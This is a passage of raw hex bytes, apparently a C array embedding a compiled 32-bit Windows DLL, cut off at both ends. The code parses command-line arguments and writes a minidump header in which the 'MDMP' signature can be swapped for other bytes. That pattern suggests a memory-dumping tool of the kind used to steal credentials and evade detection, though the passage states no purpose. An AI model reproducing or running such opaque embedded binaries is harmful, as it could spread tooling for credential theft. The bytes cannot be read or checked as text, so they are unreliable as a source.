FF,0xFF,0xC7,0x40,0x14,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x50,0x14,0x8B,0x40,0x10,0x89,0x44,0x24,0x08,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xF0,0xEC,0xFF,0xFF,0x85,0xC0,0x75,0x71,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x14,0x9C,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0xEC,0x00,0x74,0x4A,0x8B,0x45,0xF4,0x8B,0x50,0x14,0x8B,0x40,0x10,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xEA,0x1A,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x65,0x83,0x7D,0xEC,0x00,0x74,0x4A,0x8B,0x45,0xF4,0x8B,0x50,0x14,0x8B,0x40,0x10,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x93,0x1A,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x85,0x70,0xFE,0xFF,0xFF,0x8B,0x45,0xF0,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x9B,0xEC,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xC2,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x71,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA9,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x67,0xEF,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x90,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x4A,0xF3,0xFF,0xFF,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x75,0x8B,0x45,0xF4,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x9E,0xFB,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x21,0xC7,0x44,0x24,0x04,0x20,0x02,0x00,0x00,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0xB2,0x9A,0xFF,0xFF,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x39,0xC7,0x44,0x24,0x04,0x20,0x02,0x00,0x00,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x91,0x9A,0xFF,0xFF,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x77,0x9A,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x81,0xEC,0xB4,0x03,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xB8,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x01,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x8D,0x95,0xAC,0xFE,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0x8D,0x95,0xA4,0xFC,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x82,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x85,0x9C,0xFC,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xA0,0xFC,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x8D,0x85,0xA4,0xFC,0xFF,0xFF,0x89,0x85,0xA0,0xFC,0xFF,0xFF,0x66,0xC7,0x85,0x9C,0xFC,0xFF,0xFF,0x00,0x00,0x66,0xC7,0x85,0x9E,0xFC,0xFF,0xFF,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xE8,0x27,0xDC,0xFF,0xFF,0x85,0xC0,0x74,0x22,0xC7,0x04,0x24,0x90,0xEB,0x48,0x65,0xE8,0x9B,0x86,0xFF,0xFF,0xC7,0x04,0x24,0xB0,0xEB,0x48,0x65,0xE8,0x8F,0x86,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xE9,0xBB,0x05,0x00,0x00,0xE8,0x44,0x88,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0x28,0x05,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xB2,0xEB,0x48,0x65,0xE8,0x83,0xA5,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x07,0xDE,0x4D,0xFF,0x89,0x04,0x24,0xE8,0xF2,0xA3,0xFF,0xFF,0x89,0x45,0xD4,0x83,0x7D,0xD4,0x00,0x0F,0x84,0xF2,0x04,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xCA,0xEB,0x48,0x65,0xE8,0x4A,0xA5,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x9C,0xA1,0x07,0x65,0x89,0x04,0x24,0xE8,0xB9,0xA3,0xFF,0xFF,0x89,0x45,0xD0,0x83,0x7D,0xD0,0x00,0x0F,0x84,0xBC,0x04,0x00,0x00,0xC7,0x85,0x98,0xFC,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8B,0x45,0xD0,0xFF,0xD0,0x8D,0x95,0x98,0xFC,0xFF,0xFF,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0x8B,0x45,0xD4,0xFF,0xD0,0x83,0xEC,0x08,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x84,0x8E,0x04,0x00,0x00,0x8B,0x85,0x98,0xFC,0xFF,0xFF,0x85,0xC0,0x0F,0x84,0x80,0x04,0x00,0x00,0xC7,0x45,0xE0,0x01,0x00,0x00,0x00,0xE9,0x5E,0x02,0x00,0x00,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x00,0xC7,0x44,0x24,0x04,0xE4,0xEB,0x48,0x65,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x74,0x27,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x00,0xC7,0x44,0x24,0x04,0xEA,0xEB,0x48,0x65,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x75,0x0C,0xC7,0x45,0xE8,0x01,0x00,0x00,0x00,0xE9,0x00,0x02,0x00,0x00,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x00,0xC7,0x44,0x24,0x04,0xFA,0xEB,0x48,0x65,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x74,0x27,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x00,0xC7,0x44,0x24,0x04,0x00,0xEC,0x48,0x65,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x75,0x79,0x8B,0x45,0xE0,0x8D,0x50,0x01,0x8B,0x85,0x98,0xFC,0xFF,0xFF,0x39,0xC2,0x7C,0x1D,0xC7,0x04,0x24,0x10,0xEC,0x48,0x65,0xE8,0xF2,0x84,0xFF,0xFF,0xC7,0x04,0x24,0xB0,0xEB,0x48,0x65,0xE8,0xE6,0x84,0xFF,0xFF,0xE9,0xB8,0x03,0x00,0x00,0x83,0x45,0xE0,0x01,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x00,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x89,0x44,0x24,0x04,0x8D,0x85,0xAC,0xFE,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x16,0x17,0x00,0x00,0x8D,0x85,0xAC,0xFE,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8D,0x85,0x9C,0xFC,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x78,0x8F,0xFF,0xFF,0xE9,0x39,0x01,0x00,0x00,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x00,0xC7,0x44,0x24,0x04,0x26,0xEC,0x48,0x65,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x74,0x27,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x00,0xC7,0x44,0x24,0x04,0x2C,0xEC,0x48,0x65,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x75,0x62,0x8B,0x45,0xE0,0x8D,0x50,0x01,0x8B,0x85,0x98,0xFC,0xFF,0xFF,0x39,0xC2,0x7C,0x1D,0xC7,0x04,0x24,0x38,0xEC,0x48,0x65,0xE8,0x2B,0x84,0xFF,0xFF,0xC7,0x04,0x24,0xB0,0xEB,0x48,0x65,0xE8,0x1F,0x84,0xFF,0xFF,0xE9,0xF1,0x02,0x00,0x00,0x83,0x45,0xE0,0x01,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x00,0xC7,0x44,0x24,0x08,0x0A,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x59,0x16,0x00,0x00,0x89,0x45,0xF0,0xE9,0x89,0x00,0x00,0x00,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x00,0xC7,0x44,0x24,0x04,0x4C,0xEC,0x48,0x65,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x74,0x27,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x00,0xC7,0x44,0x24,0x04,0x52,0xEC,0x48,0x65,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x75,0x09,0xC7,0x45,0xEC,0x01,0x00,0x00,0x00,0xEB,0x32,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x00,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x6A,0xEC,0x48,0x65,0xE8,0x6D,0x83,0xFF,0xFF,0xC7,0x04,0x24,0xB0,0xEB,0x48,0x65,0xE8,0x61,0x83,0xFF,0xFF,0xE9,0x33,0x02,0x00,0x00,0x83,0x45,0xE0,0x01,0x8B,0x85,0x98,0xFC,0xFF,0xFF,0x39,0x45,0xE0,0x0F,0x8C,0x93,0xFD,0xFF,0xFF,0x8B,0x45,0xE4,0x89,0x04,0x24,0xA1,0x64,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x04,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x0F,0xB7,0x85,0x9C,0xFC,0xFF,0xFF,0x66,0x85,0xC0,0x0F,0x84,0xE3,0x01,0x00,0x00,0xE8,0x19,0xE0,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0xD4,0x01,0x00,0x00,0x83,0x7D,0xF0,0x00,0x75,0x12,0xE8,0x90,0x9D,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xBF,0x01,0x00,0x00,0x0F,0xB7,0x85,0x9C,0xFC,0xFF,0xFF,0x66,0x85,0xC0,0x75,0x1D,0xC7,0x04,0x24,0x80,0xEC,0x48,0x65,0xE8,0xE0,0x82,0xFF,0xFF,0xC7,0x04,0x24,0xB0,0xEB,0x48,0x65,0xE8,0xD4,0x82,0xFF,0xFF,0xE9,0xA6,0x01,0x00,0x00,0x8D,0x85,0x9C,0xFC,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x78,0x90,0xFF,0xFF,0x85,0xC0,0x0F,0x84,0x83,0x01,0x00,0x00,0xC7,0x44,0x24,0x44,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x3C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x34,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0x8D,0x85,0xAC,0xFE,0xFF,0xFF,0x89,0x44,0x24,0x2C,0x8B,0x45,0xE8,0x89,0x44,0x24,0x28,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x44,0x24,0x08,0x8B,0x45,0xF0,0x89,0x44,0x24,0x04,0x8D,0x45,0xB4,0x89,0x04,0x24,0xE8,0xB8,0xAB,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0xE7,0x00,0x00,0x00,0x83,0x7D,0xE8,0x00,0x74,0x15,0xC7,0x45,0xC8,0x4D,0x44,0x4D,0x50,0x66,0xC7,0x45,0xCC,0x93,0xA7,0x66,0xC7,0x45,0xCE,0x00,0x00,0xEB,0x22,0x8D,0x45,0xB8,0x83,0xC0,0x16,0x89,0x44,0x24,0x08,0x8D,0x45,0xB8,0x83,0xC0,0x14,0x89,0x44,0x24,0x04,0x8D,0x45,0xB8,0x83,0xC0,0x10,0x89,0x04,0x24,0xE8,0x37,0x96,0xFF,0xFF,0xC7,0x45,0xB0,0x00,0x00,0x80,0x0C,0x8D,0x45,0xB0,0x89,0x04,0x24,0xE8,0x6C,0x95,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x8E,0x00,0x00,0x00,0x8B,0x45,0xB4,0x89,0x45,0xB8,0x8B,0x45,0xD8,0x89,0x45,0xBC,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x8B,0x45,0xB0,0x89,0x45,0xC4,0x8D,0x45,0xB8,0x89,0x04,0x24,0xE8,0x37,0xF9,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x74,0x64,0x83,0x7D,0xE8,0x00,0x75,0x12,0x8B,0x55,0xC0,0x8B,0x45,0xBC,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x6E,0x95,0xFF,0xFF,0x8B,0x55,0xC0,0x8B,0x45,0xBC,0x89,0x54,0x24,0x08,0x89,0x44,0x24,0x04,0x8D,0x85,0x9C,0xFC,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x3C,0x8D,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x74,0x2A,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x22,0x90,0xEB,0x1F,0x90,0xEB,0x1C,0x90,0xEB,0x19,0x90,0xEB,0x16,0x90,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xE4,0x00,0x74,0x10,0x8B,0x45,0xE4,0x89,0x04,0x24,0xA1,0x64,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x04,0x8B,0x45,0xBC,0x85,0xC0,0x74,0x19,0x8B,0x45,0xC4,0x85,0xC0,0x74,0x12,0x8B,0x55,0xC4,0x8B,0x45,0xBC,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0xEE,0x94,0xFF,0xFF,0x8B,0x45,0xB4,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xB4,0x89,0x04,0x24,0xE8,0xE0,0xD6,0xFF,0xFF,0x83,0x7D,0xF4,0x00,0x75,0x0E,0x8D,0x85,0xAC,0xFE,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xA2,0x8F,0xFF,0xFF,0x8B,0x45,0xF4,0x8B,0x7D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x08,0x83,0x7D,0x0C,0x03,0x74,0x25,0x83,0x7D,0x0C,0x03,0x77,0x26,0x83,0x7D,0x0C,0x02,0x74,0x1C,0x83,0x7D,0x0C,0x02,0x77,0x1A,0x83,0x7D,0x0C,0x00,0x74,0x13,0x83,0x7D,0x0C,0x01,0x75,0x0E,0xE8,0x16,0xF9,0xFF,0xFF,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC2,0x0C,0x00,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x66,0x90,0x66,0x90,0xA1,0x80,0xD0,0x48,0x65,0x8B,0x00,0x85,0xC0,0x74,0x2D,0x55,0x89,0xE5,0x83,0xEC,0x08,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0xFF,0xD0,0xA1,0x80,0xD0,0x48,0x65,0x8D,0x50,0x04,0x8B,0x40,0x04,0x89,0x15,0x80,0xD0,0x48,0x65,0x85,0xC0,0x75,0xE9,0xC9,0xC3,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0xC3,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x53,0x83,0xEC,0x14,0x8B,0x1D,0x60,0xCD,0x48,0x65,0x83,0xFB,0xFF,0x74,0x2E,0x85,0xDB,0x74,0x16,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0xFF,0x14,0x9D,0x60,0xCD,0x48,0x65,0x83,0xEB,0x01,0x75,0xF4,0xC7,0x04,0x24,0x10,0xBA,0x48,0x65,0xE8,0x58,0x59,0xFF,0xFF,0x8B,0x5D,0xFC,0xC9,0xC3,0x8D,0x76,0x00,0x31,0xC0,0x8D,0xB6,0x00,0x00,0x00,0x00,0x89,0xC3,0x83,0xC0,0x01,0x8B,0x14,0x85,0x60,0xCD,0x48,0x65,0x85,0xD2,0x75,0xF0,0xEB,0xB8,0x8D,0xB6,0x00,0x00,0x00,0x00,0xA1,0x20,0x4A,0x49,0x65,0x85,0xC0,0x74,0x07,0xC3,0x8D,0xB6,0x00,0x00,0x00,0x00,0xC7,0x05,0x20,0x4A,0x49,0x65,0x01,0x00,0x00,0x00,0xEB,0x84,0x90,0x90,0x90,0x90,0x55,0x89,0xE5,0x83,0xEC,0x18,0x8B,0x45,0x0C,0x83,0xF8,0x03,0x74,0x12,0x85,0xC0,0x74,0x0E,0xC9,0xB8,0x01,0x00,0x00,0x00,0xC2,0x0C,0x00,0x2E,0x8D,0x74,0x26,0x00,0x89,0x44,0x24,0x04,0x8B,0x55,0x10,0x8B,0x45,0x08,0x89,0x54,0x24,0x08,0x89,0x04,0x24,0xE8,0xFA,0x06,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC2,0x0C,0x00,0x90,0x55,0x89,0xE5,0x53,0x83,0xEC,0x14,0x83,0x3D,0x8C,0xD0,0x48,0x65,0x02,0x8B,0x45,0x0C,0x74,0x0A,0xC7,0x05,0x8C,0xD0,0x48,0x65,0x02,0x00,0x00,0x00,0x83,0xF8,0x02,0x74,0x16,0x83,0xF8,0x01,0x74,0x49,0x8B,0x5D,0xFC,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC2,0x0C,0x00,0x2E,0x8D,0x74,0x26,0x00,0xBB,0x28,0x70,0x49,0x65,0x81,0xFB,0x28,0x70,0x49,0x65,0x74,0xE2,0x8D,0x76,0x00,0x8B,0x03,0x85,0xC0,0x74,0x02,0xFF,0xD0,0x83,0xC3,0x04,0x81,0xFB,0x28,0x70,0x49,0x65,0x75,0xED,0x8B,0x5D,0xFC,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC2,0x0C,0x00,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0x8B,0x45,0x10,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x89,0x44,0x24,0x08,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x66,0x06,0x00,0x00,0x8B,0x5D,0xFC,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC2,0x0C,0x00,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x31,0xC0,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x89,0xE5,0x53,0x8D,0x5D,0x0C,0x83,0xEC,0x14,0xC7,0x04,0x24,0x02,0x00,0x00,0x00,0xE8,0x6A,0x0E,0x00,0x00,0xC7,0x44,0x24,0x08,0x1B,0x00,0x00,0x00,0x89,0x44,0x24,0x0C,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xE0,0xEC,0x48,0x65,0xE8,0x22,0x10,0x00,0x00,0xC7,0x04,0x24,0x02,0x00,0x00,0x00,0xE8,0x3E,0x0E,0x00,0x00,0x8B,0x55,0x08,0x89,0x5C,0x24,0x08,0x89,0x04,0x24,0x89,0x54,0x24,0x04,0xE8,0x73,0x10,0x00,0x00,0xE8,0xE6,0x0F,0x00,0x00,0x8D,0xB6,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x57,0x56,0x53,0x89,0xC3,0x83,0xEC,0x3C,0x8B,0x35,0x44,0x4A,0x49,0x65,0x85,0xF6,0x0F,0x8E,0x07,0x01,0x00,0x00,0xA1,0x48,0x4A,0x49,0x65,0x31,0xC9,0x83,0xC0,0x0C,0x2E,0x8D,0x74,0x26,0x00,0x8B,0x10,0x39,0xD3,0x72,0x0E,0x8B,0x78,0x04,0x03,0x57,0x08,0x39,0xD3,0x0F,0x82,0x81,0x00,0x00,0x00,0x83,0xC1,0x01,0x83,0xC0,0x14,0x39,0xF1,0x75,0xE2,0x89,0x1C,0x24,0xE8,0xB2,0x07,0x00,0x00,0x89,0xC7,0x85,0xC0,0x0F,0x84,0xEF,0x00,0x00,0x00,0xA1,0x48,0x4A,0x49,0x65,0x8D,0x1C,0xB6,0xC1,0xE3,0x02,0x01,0xD8,0x89,0x78,0x10,0xC7,0x00,0x00,0x00,0x00,0x00,0xE8,0xDD,0x08,0x00,0x00,0x8B,0x15,0x48,0x4A,0x49,0x65,0x03,0x47,0x0C,0x89,0x44,0x1A,0x0C,0x8D,0x55,0xCC,0xC7,0x44,0x24,0x08,0x1C,0x00,0x00,0x00,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xFF,0x15,0x74,0x61,0x49,0x65,0x83,0xEC,0x0C,0x85,0xC0,0x0F,0x84,0x84,0x00,0x00,0x00,0x8B,0x45,0xE0,0x8D,0x50,0xFC,0x83,0xE2,0xFB,0x74,0x08,0x8D,0x50,0xC0,0x83,0xE2,0xBF,0x75,0x12,0x83,0x05,0x44,0x4A,0x49,0x65,0x01,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xC3,0x8D,0x76,0x00,0x83,0xF8,0x02,0xBA,0x04,0x00,0x00,0x00,0xB8,0x40,0x00,0x00,0x00,0x8B,0x4D,0xD8,0x0F,0x44,0xC2,0x8B,0x55,0xCC,0x03,0x1D,0x48,0x4A,0x49,0x65,0x89,0x4B,0x08,0x89,0x53,0x04,0x89,0x5C,0x24,0x0C,0x89,0x44,0x24,0x08,0x89,0x4C,0x24,0x04,0x89,0x14,0x24,0xFF,0x15,0x70,0x61,0x49,0x65,0x83,0xEC,0x10,0x85,0xC0,0x75,0xB0,0xFF,0x15,0x34,0x61,0x49,0x65,0xC7,0x04,0x24,0x50,0xED,0x48,0x65,0x89,0x44,0x24,0x04,0xE8,0x84,0xFE,0xFF,0xFF,0x8D,0x74,0x26,0x00,0x31,0xF6,0xE9,0x1F,0xFF,0xFF,0xFF,0xA1,0x48,0x4A,0x49,0x65,0x8B,0x44,0x18,0x0C,0x89,0x44,0x24,0x08,0x8B,0x47,0x08,0xC7,0x04,0x24,0x1C,0xED,0x48,0x65,0x89,0x44,0x24,0x04,0xE8,0x59,0xFE,0xFF,0xFF,0x89,0x5C,0x24,0x04,0xC7,0x04,0x24,0xFC,0xEC,0x48,0x65,0xE8,0x49,0xFE,0xFF,0xFF,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x4C,0x8B,0x3D,0x40,0x4A,0x49,0x65,0x85,0xFF,0x74,0x0D,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xC3,0x2E,0x8D,0x74,0x26,0x00,0xC7,0x05,0x40,0x4A,0x49,0x65,0x01,0x00,0x00,0x00,0xE8,0x01,0x07,0x00,0x00,0x8D,0x04,0x80,0x8D,0x04,0x85,0x1B,0x00,0x00,0x00,0xC1,0xE8,0x04,0xC1,0xE0,0x04,0xE8,0x4C,0x09,0x00,0x00,0xC7,0x05,0x44,0x4A,0x49,0x65,0x00,0x00,0x00,0x00,0x29,0xC4,0x8D,0x44,0x24,0x23,0x83,0xE0,0xF0,0xA3,0x48,0x4A,0x49,0x65,0xB8,0x6C,0xF1,0x48,0x65,0x2D,0x6C,0xF1,0x48,0x65,0x83,0xF8,0x07,0x7E,0xA8,0x8B,0x15,0x6C,0xF1,0x48,0x65,0x83,0xF8,0x0B,0x0F,0x8F,0x0E,0x01,0x00,0x00,0xBB,0x6C,0xF1,0x48,0x65,0x8B,0x03,0x85,0xC0,0x0F,0x85,0xAC,0x01,0x00,0x00,0x8B,0x43,0x04,0x85,0xC0,0x0F,0x85,0xA1,0x01,0x00,0x00,0x8B,0x43,0x08,0x83,0xF8,0x01,0x0F,0x85,0x3F,0x02,0x00,0x00,0x83,0xC3,0x0C,0x81,0xFB,0x6C,0xF1,0x48,0x65,0x0F,0x83,0x64,0xFF,0xFF,0xFF,0x89,0x7D,0xCC,0x89,0xDE,0xEB,0x5E,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0